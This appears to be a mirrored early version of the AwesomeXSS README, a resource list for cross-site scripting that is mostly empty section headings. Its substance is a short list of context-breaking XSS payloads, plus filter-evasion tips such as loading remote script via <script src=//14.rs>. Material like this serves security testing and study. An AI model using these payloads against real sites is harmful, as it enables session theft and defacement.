Mirror of https://github.com/s0md3v/AwesomeXSS
AwesomeXSS
Awesome XSS stuff. Put this repo on watch. I will be updating it regularly.
Awesome Books
Awesome Websites
Awesome People
- Rodolfo Assis
- Ashar Javed
- Somdev Sangwan I own this repo, I can write whatever the fuck I want :v
Awesome Reads
Awesome Presentations
- How I met your girlfriend
- How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour
- Blind XSS
- Copy Pest
Awesome Context Breaking
Simple Context
<svg onload=alert()>
</tag><svg onload=alert()>
Attribute Context
"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//
JavaScript Context
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>
Awesome Payloads
Come back later
Awesome Exploits
Come back later
Awesome Tags & Event Handlers
Come back later
Awesome Methodology
Come back later
Awesome Tools
Awesome Tips & Tricks
- http:// can be shortened to //
- document.cookie can be shortened to cookie. It applies to other DOM objects as well.
- alert and other pop-up functions don't need a value, so stop doing alert(1) and start doing alert()
- I have found that confirm is the least detected pop-up function so stop using alert.
- Quotes around attribute value aren't necessary. You can use <script src=//14.rs> instead of <script src="//14.rs">
- The shortest independent payload is <embed src=//14.rs> (19 chars)
Credits and all that
All the payloads are crafted by me unless specified. Thanks to my big brother Rodolfo Assis whose writings inspired me to become an XSSLord.